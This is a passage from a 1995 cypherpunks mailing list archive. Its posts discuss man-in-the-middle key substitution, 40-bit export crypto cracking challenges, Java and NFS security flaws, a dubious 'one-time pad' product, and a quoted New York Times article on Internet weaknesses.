Alternatively, he could defeat the use of key certificates which bind names to
keys by the simple strategem of substituting the name of the user when he
substitutes his keys.  If Alice has all of her posts appearing under
the name of "Bob" unbeknownst to her, then if Bob is the MITM he can get
a certificate and publish it.  All the messages which refer to "Bob" get
changed to refer to "Alice" as they are passed from the net to her,
similar to the key substitution which would also have to be done.  If
Bob's name were a bit unusual this could be done with a simple script.
So even fully valid key certificates may not be effective against MITM
attacks of this type.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Wed, 11 Oct 95 07:55:12 PDT
To: rschlafly@attmail.com
Subject: Re: PKP Lawsuit progress report
Message-ID: <9510111448.AA05691@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


Roger Schlafly sez -=*||
                      \/
> 
> (3) There will be a hearing on the patent validity (and a couple of
> annoying technical legal issues) at 10:00 am, Dec. 6, 1995, in the
> court of Judge Spencer Williams, Federal Bldg, 280 S. First St,
> San Jose CA 95113.  The US court clerk is at 408-291-7783.  It is
> open to the public.

Thanks for letting us know.  I'll be there unless they chain me to
my desk at work;)

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 11 Oct 95 08:25:19 PDT
To: perry@piermont.com
Subject: Re: Netscape & Fortessa
Message-ID: <v02120d0faca198b71d15@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:12 10/11/95, Perry E. Metzger wrote:

>I wasn't aware of that -- I believe that this may have happened
>because those of us who cared didn't attend the zoo in Stockholm. The
>meeting was a complete joke, with the Microsoft people and others
>making it clear that they didn't intend to follow the process. Many of
>us who cared decided to do better things with our time instead of
>showing up in the aptly named Weapons room for the second session.

Unfortunately, I wasn't in Stockholm. I just follow the discussion on the
mailing list.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "K. M. Ellis" <kelli@zeus.towson.edu>
Date: Wed, 11 Oct 95 05:34:49 PDT
To: cypherpunks@toad.com
Subject: Re: NYT on Internet Flaws
In-Reply-To: <199510110939.FAA26747@pipe4.nyc.pipeline.com>
Message-ID: <Pine.ULT.3.91.951011082926.19204C-100000@zeus.towson.edu>
MIME-Version: 1.0
Content-Type: text/plain



This one is _really ripe_ for a response to the editor.  Ideas?

We could start something off-list if there are several interested in 
co-authoring.

-=Kathleen M. Ellis=-

kelli@zeus.towson.edu       Geek Code v3.0      http://zeus.towson.edu/~kelli/
GAT dx s++:- a-- C++ uu+++ P+ L++ E- W++ N K W--- O- M- V-- PS+++ PE- Y++(-)>
PGP+>++ t+ 5 x+ R tv b+++ DI- D--- G e h* r+ z**
Diverse Sexual Orientation Coll.Towson State University DSOC@zeus.towson.edu

"Privacy is stupid."
	-D. Denning





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 11 Oct 95 08:34:22 PDT
To: cypherpunks@toad.com
Subject: [Noise] FWD:Want to trade UNIX skills for Laissez Faire Books?
Message-ID: <v02120d10aca1a1b8e942@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


Given the large number of non-statists on this list, here is a brief
forward FYI:
>--------------------------------------
>Date: 10/11/95 0:34
>From: libernet-d@Dartmouth.EDU
>
>I'm looking for someone to help me with the technical aspects of Laissez
>Faire Books' Internet presence. I need someone who has knowledge of unix
>systems and can modify perl scripts... and has the *time* to do a little
>work on our new Web site. Hopefully this would be the start of an on-going
>relationship.
>
>Most importantly, I'm looking for an enthusiastic libertarian who doesn't
>mind being paid with book credit and a kind "thank you" instead of cash. :-)
>
>Know anyone who might be interested?
>
>Thanks,
>
>Chris
>
>-----------------------------------------------------------------------
>Chris Whitten           Chris@Free-Market.com           Ask me about...

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Wed, 11 Oct 95 05:41:53 PDT
To: cypherpunks@toad.com
Subject: Re: Graphic encryption and XV
In-Reply-To: <9510111109.AA19990@cfdevx1.lehman.com>
Message-ID: <Pine.3.89.9510110828.A91272-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 11 Oct 1995, Rick Busdiecker wrote:

> Does anyone have patches to XV that allow it to display a PGP
> encrypted image without having to explicitly decrypt it first?
XV? Which is?
(Some viewer that runs on X windows?)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Martin Diehl" <mdiehl@dttus.com>
Date: Wed, 11 Oct 95 06:39:46 PDT
To: cypherpunks@toad.com
Subject: Public Awarreness of Security
Message-ID: <9509118134.AA813425023@cc2.dttus.com>
MIME-Version: 1.0
Content-Type: text/plain


     On October 11, 1995, John Markoff of the NYTimes writes:
     "Newly publicized weaknesses in the basic structure of the Internet 
     [snip]
     .. advantage of the fault-finding talents of the Berkeley researchers 
     and other like-minded experts, the company announced a contest today 
     called Netscape Bugs Bounty
     [snip]"
     
     On October 11, 1995, Joan E. Rigdon of the Wall Street Journal writes: 
     "The software industry is starting to sweep the bugs out of the closet 
     [snip]
     ... Netscape is trying to systematically tap the intelligence of the 
     hackers instead of randomly waiting for them to find mistakes.
     [snip]"
     
     Both of these stories bring out not only the flaws in the Internet and 
     software to use the Internet, but also the work going on both at the 
     software developers as well as that by groups such as ours that are 
     active in identifying the risks.
     
     Congratulations to the Cypherpunks
     
     Martin G. Diehl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Wed, 11 Oct 95 09:08:17 PDT
To: kelli@zeus.towson.edu
Subject: Re: NYT on Internet Flaws
Message-ID: <9510111604.AA06660@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: "K. M. Ellis" <kelli@zeus.towson.edu>
> 
> This one is _really ripe_ for a response to the editor.  Ideas?
> 
> We could start something off-list if there are several interested in 
> co-authoring.
> 
I'd love to see something in there about most commercial sites being behind
firewalls without nfs access across the firewall.  This greatly reduces the
risk from the nfs problems.  If you get your binary via nfs from a trusted
host inaccessible from the internet, then if you have this problem management
can handle it as an employee problem;)  There are ways to make secure
firewalls, it's fairly well understood.  Sometimes people point to things
like the hack Mitnick did last Christmas, but his attack took advantage of
a couple of things a security expert shouldn't have allowed, first and
foremost two machines were accesible from the internet, and one of them
trusted root logins from the other without a password:(

I could write something up about it if you'd like.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 11 Oct 95 06:12:40 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Netscape & Fortessa
In-Reply-To: <199510110427.AAA05498@book.hks.net>
Message-ID: <199510111312.JAA14704@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Lucky Green writes:
> Yes, it might, because of the strong support by vendors for voluntary GAK
> or no crypto at all. Let me explain. There are a number of indicators that
> show that strong crypto is losing in the global marketplace. Example: the
> charter of the new IETF Internet Payment Systems working group requires
> that the use of crypto be limited. In the discussion about the charter,
> the near unanimous consent (with myself as the sole dissenter) was that
> crypto may only be used for authentication, not confidentiality.

I wasn't aware of that -- I believe that this may have happened
because those of us who cared didn't attend the zoo in Stockholm. The
meeting was a complete joke, with the Microsoft people and others
making it clear that they didn't intend to follow the process. Many of
us who cared decided to do better things with our time instead of
showing up in the aptly named Weapons room for the second session.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 11 Oct 95 06:19:04 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: java security concerns
In-Reply-To: <199510110550.BAA02068@clark.net>
Message-ID: <199510111318.JAA14723@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Ray Cromwell writes:
>    I agree, however I would point out that not all postscript interpreters
> are emasculated (especially those on unix systems like IRIX, they contain
> all kinds of calls to fork(), read()/open(), etc).

Many postscript interpreters are a serious security threat. However, I
found it fairly easy to chop enough of the code out for the one I run
that I feel safe with it -- the exercise wasn't that hard.

> Nothing in the Java spec tells you that you must call fork() in a
> Java interpreter implementation. In fact, Java has nothing to do
> with the GUI calls, the network calls, etc. You can support as much
> or as little system I/O in a Java implementation as you want.

Yes, but in practice, to support the given applets that Netscape will
be browsing you have to open the kimono a bit too much overall. With
sufficient emasculation, I believe Java could be made safe, but then
it wouldn't be the Java that Sun and Netscape are pushing any more.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: madden@mpi-sb.mpg.de (Peter Madden) (by way of Duncan Frissell <madden@mpi-sb.mpg.de>)
Date: Wed, 11 Oct 95 06:36:13 PDT
To: cypherpunks@toad.com
Subject: Re: [NOISE] was Re: java security concerns
Message-ID: <199510111335.JAA17959@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



> Rather than trying to prove a program to be correct (which I agree is doomed
> to failure for the forseeable future for all but trivial programs)


I disagree: automatic program verification has come along in leaps and
bounds, largely due to the current research impetus in safety critical
systems. Various sorting programs, bin-packing programs, to mention
but a few, have all been successfully auto. verified (and these are
non-trivial programs, which form the building-blocks of even less
trivial "industrial-sized" programs).  Indeed, the technology has been
extrapolated to the automatic verification of electronic circuits,
compilers, schedule problems and computer configerations (all w.r.t. a
user's specification). The real problems lie with specifying the
program/problem correctly in the first place (so-called specifications
capture), and with automatic program *synthesis* from specifications
(which, in mathematical theorem proving terms, presents the problem of
creating existential objects, as opposed to just verifying that they
do the right job).

 I do, however, agree with the need/desire for a greater diversity of
program properties which can be automatically checked. 


Regards,

Peter

=================================================================

Dr Peter Madden,                                Email: madden@mpi-sb.mpg.de
Max-Planck-Institut fuer Informatik,            Phone: (49) (681) 302-5434
Im Stadtwald, W-66123 Saarbruecken, Germany.       Fax: (49) (681) 302-5401

=================================================================







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: madden@mpi-sb.mpg.de (Peter Madden) (by way of Duncan Frissell <madden@mpi-sb.mpg.de>)
Date: Wed, 11 Oct 95 06:36:15 PDT
To: cypherpunks@toad.com
Subject: Re: [NOISE] was Re: java security concerns
Message-ID: <199510111336.JAA17969@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



> Did you also send this post to cypherpunks@toad.com?

No I didn't -- wasn't sure if that's where F. Stuart's email
originated from. Please feel free to circulate to the universe, along
with some further clarification below.



 I hope I wasn't too positive in my support
of auto. program verification. There are real problems. However, with
the development of the field called formal methods, computation
has been directly linked to mathematical logic, which is a much
better understood, and well circumscribed, domain than programming
languages per se.
 
 Applications of formal methods in software engineering depend
critically on the use of automated theorem provers to provide improved
support for the development of safety critical systems.  Potentially
catastrophic consequences can derive from the failure of computerized
systems upon which human lives rely such as medical diagnostic
systems, air traffic control systems and defence systems (the recent
failure of the computerized system controlling the London Ambulance
Service provides an example of how serious software failure can be).
Formal methods are used to provide programs with, or prove that
programs have, certain properties: a program may be proved to
terminate; two programs may be proved equivalent; an inefficient
program may be transformed into an equivalent efficient program; a
program may be verified to satisfy some specification (i.e. a program
is proved to compute the specified function/relation); and a program
may be synthesized that satisfies some specification.

 Program Verification boils down to proving a mathematical conjecture
specifying that a given program will, for all inputs of a certain
type, generate outputs of a certain type.  This is relatively
straightforward -- we already have the program P described in the
initial conjecture to be proved.


Program synthesis, on the other hand, starts with a similar
conjecture *except* that P remains an unidentified variable.
The task of synthesis (auto. or otherwise) is to incrementally identify
P as the conjecture proof is unraveled. This requires all kinds
of "intelligent", and often intuitive,  choices during the proof, and
is consequently a difficult process to automate.

Peter

=================================================================

Dr Peter Madden,                                Email: madden@mpi-sb.mpg.de
Max-Planck-Institut fuer Informatik,            Phone: (49) (681) 302-5434
Im Stadtwald, W-66123 Saarbruecken, Germany.       Fax: (49) (681) 302-5401

=================================================================







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Wed, 11 Oct 95 01:55:32 PDT
To: cypherpunks@toad.com
Subject: MITM evasionMITM evasion
Message-ID: <199510110855.JAA17966@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Two years ago, I pointed out that getting a single message past
the man in the middle isn't good enough; you have to convince your
readers that the key they received on one channel is more accurate
than the key they're receiving on all the other channels.
But if they'll believe that, they may also believe the man in the middle's
announcement that the key in your name on all the keyservers is
wrong, and the correct key is the one he's putting out.
Can't win either way, but it's still important to get the key out.

My current key is 0x54696D4D; the fingerprint is 
4D 65 44 75 53 61 21 2F   41 73 55 64 85 6D 21 7F.

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Wed, 11 Oct 95 02:08:46 PDT
To: Piete Brooks <Piete.Brooks@computer-lab.cambridge.ac.uk>
Subject: Re: Hal's Third Challenge?
In-Reply-To: <"swan.cl.cam.:012510:951010200606"@cl.cam.ac.uk>
Message-ID: <Pine.SOL.3.91.951011094131.1754D-100000@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 10 Oct 1995, Piete Brooks wrote:

> It seems that microsoft was the one to go for, as they too use 40 bit for
> each session ....  If someone can generate the CRACKing code and someone can
> donate an example, I'd be DELIGHTED to arrange another BRUTE !

If you mean STT, they're using a hotch-potch of methods in the exportable 
version.  40 bit RC4 protects the purchase order form and receipt, single 
DES-CBC protects the financial data and they claim that direct RSA 
protects the credit card numbers although this is far from clear from the 
specification (can someone clarify this?).

So you're going to need brutedes and/or some network factoring code (the 
smallest modulus they use is 512 bits which, realistically we do not have 
a chance of attacking in a reasonable time).


Regards,

- Andy

+-------------------------------------------------------------------------+
| Andrew Brown  Internet <asb@nexor.co.uk>  Telephone +44 115 952 0585    |
| PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A  C0 1F 9F 66 64 02 4C 88   |
+-------------------------------------------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Wed, 11 Oct 95 10:08:35 PDT
To: cypherpunks@toad.com
Subject: Re: Elementrix POTP
In-Reply-To: <199510102120.RAA110954@tequesta.gate.net>
Message-ID: <199510111708.KAA09582@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> liberty@gate.net (Jim Ray) writes:
> Sorry to continue "beating a dead horse" here, but I forwarded a few
> C-punks' messages regarding the Elementrix "Power One-Time Pad" to
> this person, and I thought you might be interested in her (somewhat
> cryptic <g>) response.

Actually, no, and I'll tell you why.  My only interest in this product
is that you're flogging it as a one time pad, and just calling something
a one time pad doesn't make it so.  From all that's been exposed so far,
it looks like it doesn't match the standard definition of a one time pad
in standard cryptologic works.  Maybe it's something <like> it, and maybe
not -- but if they're saying it <is> a one time pad they should be
prepared to prove it.  Reading their warmed-over press releases doesn't
interest me at all.

Except for one thing, i.e. this line from the last blather:

>The encryption is not done by using an encryption algorithm.

'Nuff said for now, I think.

	Jim Gillogly
	Mersday, 20 Winterfilth S.R. 1995, 17:05




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Tue, 10 Oct 95 20:02:13 PDT
To: jim@acm.org
Subject: Re: Hal's Third Challenge?
In-Reply-To: <199510102043.NAA06895@mycroft.rand.org>
Message-ID: <199510102312.AA37668@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>I'd rather see a Microsoft challenge than a third Netscape 40-bitter.
>We've made our point about 40-bit keys on Netscape's skull enough times,
>and Microsoft is making smug product announcements referring to those
>Netscape breaks.
>
>Time to spread our joy around a bit, I'd say.

Indeed. With the huge amount of people that dislike m$ I think we will at
least double the amount of persons wanting to do their bit to rub their
noses in it.  Whats needed is someone to reverse engineer a m$ transfer,
according to the published specs, isolate the encrypted section and then
produce a brute engine which can be ported to the platforms we want to try.

For the person that cracks a session using the brute force program in the
next brutefest and provides the key, I will give a US$50 international money
order to. I'm sure others will pile t-shirts on you as well.

IMHO we owe Netscape some counter pr against m$, we've proved our point to
Netscape and they performed admirally by being open and responsible to the
net.community. Whilst it didnt seem to dent their share value, they did cop
some bad press (and some media weenies still think their product is broken)
because of the groups efforts. What goads me is m$ trying to use this in
their press dealing and acting like this is entirely different from their
situation. Seems to me they need it proved to them that because of their
proprietary attitude they are in a worse position. In short bring them down
to earth and serve their ego to them on a plate.

Cheers,
Mark
mark@lochard.com.au
The above opinions are rumoured to be mine.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 11 Oct 95 07:15:01 PDT
To: mlm@skyrr.is (Magnus Logi Magnusson)
Subject: Re: Hal's Third Challenge?
Message-ID: <199510111414.KAA27374@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:45 PM 10/11/95 +0000, Magnus Logi Magnusson wrote:
>Im interested too... if there is a 32 bit client for NT/Win95 (or a single
>thredded one for Win32s) capable of reporting automatic to the
>server/local server, I could probably throw in c.a. 40-50 pentiums and a
>lot more 486 (and a few HP/Sun/Alpha) :-)  Anyone working on self-reporting
>win32 client?
>

Try:

http://www.brute.cl.cam.ac.uk/ftp/pub/brute/w32clnt.zip

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 11 Oct 95 07:18:23 PDT
To: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Subject: Re: Hal's Third Challenge?
Message-ID: <199510111417.KAA27865@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:05 PM 10/10/95 +0100, Piete Brooks wrote:
>It seems that microsoft was the one to go for, as they too use 40 bit for
>each session ....  If someone can generate the CRACKing code and someone can
>donate an example, I'd be DELIGHTED to arrange another BRUTE !

Could you at least run a server that's not doing anything so that those of
us who want to install and test our clients can at least see if they work
and go into "sleep" mode?

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Herb Sutter <herbs@interlog.com>
Date: Wed, 11 Oct 95 07:10:52 PDT
To: cypherpunks@toad.com
Subject: Re: Basic Flaws in Internet Security and Commerce
Message-ID: <199510111410.KAA06465@gold.interlog.com>
MIME-Version: 1.0
Content-Type: text/plain


At 21:33 1995.10.10 -0700, Patrick Horgan wrote:
>Paul said:
>
>> A fine piece of work.  The ideas expressed in this paper should scare
>> the hell out of everyone who uses NFS for any serious applications,
>> which for a fact includes most banks and all investment banks and
>> brokage houses.  In this particular area I KNOW what is at risk.
>> Again, I congratulate the authors on a first-class effort.
>
>I agree, it's a good job of publicizing these holes, but (not to take
>anything away from these guys, I'm sure they know this), these are not
>newly found holes.  These attacks on NFS have been known and exploited
>for years and are well known within the security community.

To repeat a comment I made in sci.crypt... the described hole applies
equally well to a program (virus or other) that sits on a workstation and
intercepts calls to OS file services.  This is particularly pernicious on
platforms like PCs, but are there any platforms that don't have this
potential flaw?  The main question, in my mind, is: How can a user know he
is even running the app he thinks he's running?  Once you have an attacker
who can intercept OS file system calls, it seems to me you can know
-nothing-... checksums are no use, signatures are no use, nothing is any use
at that point -- including keeping your authent software on a floppy,
write-protected or not, since it can simply be patched as it's read in, or
the system may just execute a different program altogether.  In fact, if
it's properly done, there may not be any way to even detect that the system
has in fact been subverted.

So: If you can't trust your path to your own file system, what can you
trust?  (And this is without even talking about things like firmware
upgrades and BIOS patches and all sorts of other potential approaches.)  Can
we do no better than simply assume the local workstation file system can be
trusted?

Herb

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Herb Sutter                 2228 Urwin, Suite 102       voice (416) 618-0184
Connected Object Solutions  Oakville ON Canada L6L 2T2    fax (905) 847-6019





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Litt <littlitt@MIT.EDU>
Date: Wed, 11 Oct 95 07:20:27 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: spam detector algorithm?
In-Reply-To: <199510110303.XAA12811@thor.cs.umass.edu>
Message-ID: <199510111420.KAA00919@hazelwood.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



  futplex@pseudonym.com writes:
   > Subject: Re: spam detector algorithm?
   > Date: Tue, 10 Oct 1995 23:03:45 -0400 (EDT)
   >
   > Greg Broiles writes:
   > [many details elided...]
   >> Any thoughts about this? Interesting? Stupid? Like I said, my
   >> math is weak.  My intention is to try to cobble up a 2d version
   >> of this to see how it runs but I thought I'd see if anyone can
   >> point out why it can't work, or if it's useful enough that
   >> someone with a better math background than I've got wants to
   >> take this idea somewhere better.
   >
   > It sounds like you are liable to start reinventing parts of the
   > field of information retrieval. The automatic construction and
   > comparison of vectors of document parameters, as you suggested in
   > the part I omitted, is one approach that has met with some
   > success. (The common problem is, given a set of query attributes
   > or a model document, to find relevant documents matching the
   > query or similar to the model document. A variety of relevance
   > measures has been considered.)
   >
   > I can't give you any specific pointers, but I advise you to check out 
   > existing implementations of these and other techniques for information
   > retrieval before you spend too much time writing new code.

Check out SMART, which was originally developed by Gerard Salton at
Cornell. (He is one of the pioneers of IR.) The current release is
maintained by Chris Buckley (chrisb@balder.chrisb.com). Check out:

ftp://ftp.cs.cornell.edu/pub/smart

If you don't feel like installing the whole thing but are interested
in testing it out on some spam, then I could run some tests for you.

Here are some literary references for SMART:

@article{SB88-weight,
   author = {Gerard Salton and Chris Buckley},
   journal = ipm,
   number = {5},
   pages = {513-523},
   title = {Term-Weighting Approaches in Automatic Text Retrieval},
   volume = {24},
   year = {1988}
}

@inproceedings{BSA-trec1,
        author = {Chris~Buckley and Gerard~Salton and James~Allan},
        title = {Automatic Retrieval With Locality Information
                        Using {SMART}},
        booktitle = {Proceedings of the First Text
                        REtrieval Conference (TREC-1)},
        editor = {D. K. Harman},
        publisher = {NIST Special Publication 500-207},
        month = {March},
        year = {1993},
        pages = {59--72}
}

-jon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Wed, 11 Oct 95 07:40:23 PDT
To: Kari Laine <buster@klaine.pp.fi>
Subject: Re: Elementrix POTP
Message-ID: <199510111433.KAA46776@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I forwarded:

>> Unfortunately, and we really mean unfortunately, we can only reveal what 
>>"it is" to people who agree to a non-disclosure arrangement while we're 
>>patent pending. Otherwise we would have no problem revealing the whole 
>>method. So far, every international expert who has reviewed the method 
>>agrees (after many, many hours and days of trying to find holes) that POTP 
>>really does what we say it does.

and Kari asked:

>Maybe you could name those experts who have inspected it - thanks.

Um, in an earlier post she mentioned the venerable Mr. Kahn and
someone else whose name I forget. I think I suggested (for cypherpunk
credibility) Carl, Wei, and maybe (for the "paranoid") Perry, but
I think she just wants to take her chances with us. I suggested
also PRZ, as this would maybe help his legal fund. :) Surprisingly,
she seemed unaware of any particular NSA interest in the prod.
I assured her that they were interested, and we agreed that since
the main office of the company was in Israel there was nothing to
do on this end. She did not respond to my nosy questions about
Israel govt. ownership, or ownership period. I suppose my own
combination of nosiness, crypto relative-cluelessness, and
insistence on my own use of PGP until something's provably better
<g> was beginning to annoy her, so she said, "Go tell them this!"
to get me out of her hair. I'm still curious about how her
technology claims to do its thing, but that's why I hang with
the C-punks (at least, one reason!). ;) "We" (not me) will
(eventually) get a copy and either rake it over the coals (likely,
IMO) or "endorse" it by failing to find a weakness (not so likely,
IMO). Sorry I can't say more, but I don't know more.
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMHvVXG1lp8bpvW01AQGwnAQAjk1+LFBuWaq5xovZySk43wNRKSviS57V
JTZCQVyFugsNTUQYaYP/h2UZ4hcCtJe0aePgENm5B2tBibp9MuP0skNG9m4v+O8A
cG5vei2TDMy7vh5tNWSnDdJ5dEjttGOU/nCEGC6JpDLvfdLICRrp7KdeCIY1bhc3
Up616khae4A=
=NTqn
-----END PGP SIGNATURE-----
Regards, Jim Ray

Ray's Corolary to Murphy's Law:
"You will be spared _NOTHING_." -- Peter C. Ray [my dad].
-----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35  James Milton Ray   <liberty@gate.net>  IANAL
-----------------------------------------------------------------------
Help Phil! email zldf@clark.net or see http://www.netresponse.com/zldf
_______________________________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Berger <dvberger@eit.COM>
Date: Wed, 11 Oct 95 10:35:22 PDT
To: John Young <jya@pipeline.com>
Subject: Re: NYT on Internet Flaws
Message-ID: <199510111743.KAA20982@viper.eit.com>
MIME-Version: 1.0
Content-Type: text/plain


Just read through the stack of news this was based on (comp.security.e

At 05:39 AM 10/11/95 -0400, John Young wrote:
>   The New York Times, October 11, 1995, pp. A1, D3.
>
>   [Page One]
>
>   Discovery of lnternet Flaws Is Setback for On-Line Trade
>
>   By John Markoff
>
>
>   San Francisco, Oct. 10 -- Newly publicized weaknesses in
>   the basic structure of the Internet indicate that the
>   worldwide computer network may need a time-consuming
>   redesign before it can be safely used as a commercial
>   medium.
>
>   The flaws could allow an eavesdropper or criminal to divert
>   many types of documents or software programs traveling over
>   the Internet, examine or copy or alter them, and then pass
>   them on to the intended recipient -- who would have no easy
>   way of knowing that the files had been waylaid. Not only
>   could electronic mail be read in transit or credit card
>   numbers be copied en route, but special security techniques
>   meant to protect such transactions could be dismantled
>   without the user's knowledge.
>
>   That such security flaws exist is not surprising in a
>   system designed originally as a scientific experiment. But
>   the recent rush to the Internet by companies seeking to
>   exploit its commercial possibilities has obscured the fact
>   that giving the system a new purpose has unearthed
>   fundamental problems that could well put off true
>   commercial viability for years.
>
>   "Companies would have you believe this is a trivial
>   problem," said Eric Brewer, a professor of computer science
>   at the University of California at Berkeley. "But now there
>   is a financiat incentive to exploit these flaws and to do
>   it secretly."
>
>   The problems were described in a posting that researchers
>   at the university made on Monday to several on-line
>   discussion groups. While the discussion groups are intended
>   for computer security experts, they are potentially
>   accessible to millions of Internet users -- including
>   break-in artists, who are known to monitor such discussion
>   groups for tips on new ways to crack computer systems.
>
>   The researchers who described the Internet weaknesses
>   include two Berkeley computer science graduate students who
>   noted a security weakness in a popular Netscape
>   Communications Corporation software program last month.
>   Then as now, the students' stated motivation in publicizing
>   the problems was to underscore vulnerabilities facing all
>   companies and customers wishing to use the Internet for
>   commerce.
>
>   When the Netscape problems were disclosed last month, the
>   company said the security flaws would be corrected in the
>   next version of its software, which users would be able to
>   download at no charge from Netscape's Internet site. But
>   the newly publicized flaws in the Internet itself indicate
>   that even if a user downloaded a copy of the new, improved
>   Netscape program, a criminal could tamper with the copy
>   along the way and make it unsafe for use in credit card
>   transactions.
>
>   The problem is not Netscape's alone; it potentially affects
>   any organization that operates a computer from which files
>   or software could be downloaded over the Internet. The
>   weakness can be traced to the technical underpinnings of
>   the network, which was set up more than a quarter-century
>   ago not as a medium for conducting business but as a way
>   for academic and scientific researchers to exchange
>   information.
>
>   The disclosure of the flaws casts doubt on the aspirations
>   of companies like Netscape, which last summer had one of
>   the most successful stock offerings in Wall Street history
>   based on the promise of the impending arrival of a
>   full-fledged on-line marketplace.
>
>   "Companies should take a step back and think about this a
>   little more," said Ian Goldberg, one of the Berkeley
>   students. "If it takes a bit longer but comes out more
>   secure, we will all be better off in the long run."
>
>   The way many Internet systems are set up -- especially the
>   Internet's increasingly popular World Wide Web service in
>   which software images and even video and audio clips can be
>   easily downloaded -- information is stored on a computer
>   called a file server and then transferred to a user's
>   computer when it is needed.
>
>   The newly publicized weakness occurs in a widely used
>   Internet protocol -- or technical standard -- known as the
>   Network File System, or NFS. Because NFS does not have any
>   means for allowing the recipient of a program or document
>   to verify that it has not been altered during transmission
>   from the file server to the user, any interception or
>   tampering would go undetected.
>
>   "The Internet protocols have been insecure since day one,"
>   said Jeffrey I. Schiller, the manager of computer networks
>   at the Massachusetts Institute of Technology and director
>   of an industry task force that is trying to design a new
>   secure version of the Internet.
>
>   But the group's timetable is uncertain, and even when it
>   does have recommendations ready, Mr. Schiller is not
>   optimistic that the industry will be willing to devote the
>   time and money to put them into effect.
>
>   He said that many technologies already exist for improving
>   commercial security on the Internet, but many of them
>   require too much technical sophistication on the part of
